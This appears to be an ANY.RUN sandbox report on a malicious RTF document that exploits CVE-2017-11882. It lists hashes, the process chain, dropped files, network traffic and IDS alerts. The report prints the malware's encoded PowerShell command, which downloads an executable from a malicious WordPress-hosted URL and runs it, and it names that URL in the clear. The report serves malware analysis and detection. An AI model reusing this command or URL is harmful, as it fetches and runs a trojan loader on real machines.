analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

owe809.doc

Full analysis: https://app.any.run/tasks/7f4eb7d2-5bd8-4388-9068-29f90e573fb1
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 21, 2019, 01:39:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

30BC48880F8DB7C9530CA020574AE3CD

SHA1:

6885D6ACADEAF57AB4E7E374F19CB4747CD1373B

SHA256:

16BF215CD1E84E7FFC855C7E3C9A340C24862AD9E80527695260780EC79A73BE

SSDEEP:

48:acSSebGDvTzDXi5xokbzjEsTlven2HwDEEEEEEEEEEk:acSSCGDvrSxJFxe2sEEEEEEEEEEk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3504)
    • Application was dropped or rewritten from another process

      • nvbackend.exe (PID: 3628)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3472)
    • Loads dropped or rewritten executable

      • nvbackend.exe (PID: 3628)
  • SUSPICIOUS

    • Reads internet explorer settings

      • EQNEDT32.EXE (PID: 3504)
    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 3504)
      • powershell.exe (PID: 3472)
    • Executed via COM

      • EQNEDT32.EXE (PID: 3504)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3472)
      • nvbackend.exe (PID: 3628)
    • Executed via WMI

      • cmd.exe (PID: 2660)
    • Executes PowerShell scripts

      • EQNEDT32.EXE (PID: 3504)
    • Starts CMD.EXE for commands execution

      • netsh.exe (PID: 3828)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1372)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1372)
    • Manual execution by user

      • netsh.exe (PID: 3828)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
8
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe powershell.exe cmd.exe no specs nvbackend.exe nslookup.exe no specs netsh.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1372"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\owe809.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3504"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3472"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAGUAYwAuAHIAawAtAHMAdABvAHIAZQAuAG4AZQB0AC8AYgBsAG8AZwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAG8AdwBlAHIAcgBpAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AHQAZQBtAHAAXABuAHYAYgBhAGMAawBlAG4AZAAuAGUAeABlACIAKQApADsAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2660cmd /c %temp%\nvbackend.exeC:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3628C:\Users\admin\AppData\Local\Temp\nvbackend.exeC:\Users\admin\AppData\Local\Temp\nvbackend.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3972"C:\Windows\system32\nslookup.exe"C:\Windows\system32\nslookup.exenvbackend.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3828"C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Network Command Shell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4064/c del "C:\Windows\system32\nslookup.exe"C:\Windows\System32\cmd.exenetsh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 438
Read events
1 013
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
3
Text files
4
Unknown types
2

Dropped files

PID
Process
Filename
Type
1372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3EF0.tmp.cvr
MD5:
SHA256:
3472powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VZ0KSSEQ38AIM0TXVUBS.temp
MD5:
SHA256:
3628nvbackend.exeC:\Users\admin\AppData\Local\Temp\nse55C5.tmp
MD5:
SHA256:
3472powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
1372WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$e809.doc.rtfpgc
MD5:E735C1C365601829E0686D827F3D3E4B
SHA256:4737A3F4492415E4C962465E4B581981EB926E2320AFDC118D97F95F4FBDD4E9
3472powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134aa8.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3472powershell.exeC:\Users\admin\AppData\Local\Temp\nvbackend.exeexecutable
MD5:6E514F159E08CA401A5A6A7F89C0903F
SHA256:D4F2617839F6ED5B0FA86E7D9263D0189D49227E1D4746C6A8A5FF6DC2E8237C
3504EQNEDT32.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txttext
MD5:440240B593365FB7D6BCEA34EC091A57
SHA256:3A9DBE4F5B6AF449ACE540F39501519A9E5224824FC85305974819329539F0E4
3628nvbackend.exeC:\Users\admin\AppData\Local\Temp\FileAssociation.targetsize-32.pngimage
MD5:6ADBDB0DB2BBF1643D895350991FBAE9
SHA256:B6AB4C00D904BF4CCB8F3459153A925EBA1D845EE92E4BE52461EBBF54E31473
3628nvbackend.exeC:\Users\admin\AppData\Local\Temp\helium.dllexecutable
MD5:D2744E209D4F6FD05B07473547829729
SHA256:EDAFD5AD1972BB862214E30B605F4B42B840B99E5BA682E5E5EAAB37B96B037B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3472
powershell.exe
GET
200
183.181.0.79:80
http://ec.rk-store.net/blog/wp-includes/owerri.exe
JP
executable
363 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3472
powershell.exe
183.181.0.79:80
ec.rk-store.net
FreeBit Co.,Ltd.
JP
malicious
3504
EQNEDT32.EXE
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
ec.rk-store.net
  • 183.181.0.79
malicious
www.xn--e6q94i01ih08c.biz
unknown

Threats

PID
Process
Class
Message
3472
powershell.exe
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
3472
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3472
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
No debug info